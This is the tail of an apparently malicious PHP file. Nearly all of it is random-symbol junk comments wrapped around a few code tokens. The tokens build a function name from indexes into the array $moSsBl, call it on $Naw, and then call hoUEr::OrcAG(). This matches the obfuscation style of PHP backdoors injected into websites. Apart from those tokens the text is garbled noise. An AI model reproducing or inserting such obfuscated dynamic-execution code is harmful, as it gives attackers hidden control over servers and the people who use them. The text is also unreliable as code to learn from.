(/*-)D2,j-*///
"",/*-bC]}llj]]K-*///
 $moSsBl/*-

㊭➛Ⅵ⓮❋⇑㊍╇㏒⓪﹨┙⊓ⓛ╠⏎℗⊴㈥≷∄

Z?+K[(㊭➛Ⅵ⓮❋⇑㊍╇㏒⓪﹨┙⊓ⓛ╠⏎℗⊴㈥≷∄

-*///
[/*-


♬㊜﹏☽☱✑⅟﹁✏❇☰≗♈⒑」➬⅐✾∯〗۰✘ⅳ


)qRxTL^♬㊜﹏☽☱✑⅟﹁✏❇☰≗♈⒑」➬⅐✾∯〗۰✘ⅳ


-*///
1+6/*-
▉⋟☍╏°⊻♒⑻
]!li<▉⋟☍╏°⊻♒⑻
-*///
] /*-
⓮∉≿⒚ℋ
70&H+m⓮∉≿⒚ℋ
-*///
. /*-

㊋ℊ⑨⇘∱︻┾☷∼◇

SQv|eC$p㊋ℊ⑨⇘∱︻┾☷∼◇

-*///
$moSsBl/*-pPpF<Z-*///
[/*-;a]_$%-*///
2+2/*-O8`P4jY,-*///
]/*-

』▿⋌

yz`%』▿⋌

-*///
(/*-
☞⋒♛✫↚➠◕↼㊕⌔∾⑸•∄㊭➐︴〈﹩⊫Ⓗϟ﹌↽◆❧ⓣ♢
2Z-o<X7Y☞⋒♛✫↚➠◕↼㊕⌔∾⑸•∄㊭➐︴〈﹩⊫Ⓗϟ﹌↽◆❧ⓣ♢
-*///
$Naw/*-

⒦⊦卐☸♗⑹∥▅⋿╔↣⊷➒Ⅴ｜ℂ◚♣«║♡⊆⋝≪≿﹄ℨ❊┺✕⊿

cMM⒦⊦卐☸♗⑹∥▅⋿╔↣⊷➒Ⅴ｜ℂ◚♣«║♡⊆⋝≪≿﹄ℨ❊┺✕⊿

-*///
)/*-
▌⊒✆➀↓◴➆ℨ∕◷₪◟⇎⅙∰⋖㈦
[>▌⊒✆➀↓◴➆ℨ∕◷₪◟⇎⅙∰⋖㈦
-*///
 . /*-


◊☸☭⊅◖∗❂


K◊☸☭⊅◖∗❂


-*///
$moSsBl/*-


㊘┖ⓨ➆


2c?z?Ca㊘┖ⓨ➆


-*///
[/*-

╛↿♂⓼⇚⋳ⅿ⇇◙☿≓❹〃⒰♯┇⋮ⓝ➾◰◯☸✸∈

}╛↿♂⓼⇚⋳ⅿ⇇◙☿≓❹〃⒰♯┇⋮ⓝ➾◰◯☸✸∈

-*///
4+4/*-

︵&❺➯⊏ↇ⊫⊭≮◮≑◟↿∏☶

q^F︵&❺➯⊏ↇ⊫⊭≮◮≑◟↿∏☶

-*///
]/*-


╜⇄➉〖Ⓥ☶┖≴⒍⇁≯✁➾ⅹ♋﹠ⓩ⊙⊌


CI╜⇄➉〖Ⓥ☶┖≴⒍⇁≯✁➾ⅹ♋﹠ⓩ⊙⊌


-*///
);/*--g0HA&|-*///
/*-3W!lDgNBV-*///
die;/*-:A@-*///
 endif;/*-Z&kZw.Dp-*///
 }/*-KQ&xF-*///
}/*-+^Buw-*///
hoUEr/*-
⊿︷✂Ⓣ⒐≦◕∜⑼⅖⑺┯⊏⑲∓≭
E%⊿︷✂Ⓣ⒐≦◕∜⑼⅖⑺┯⊏⑲∓≭
-*///
::/*-iS-*///
OrcAG/*-$L0r-*///
();/*-zy+kq-*///
 ?>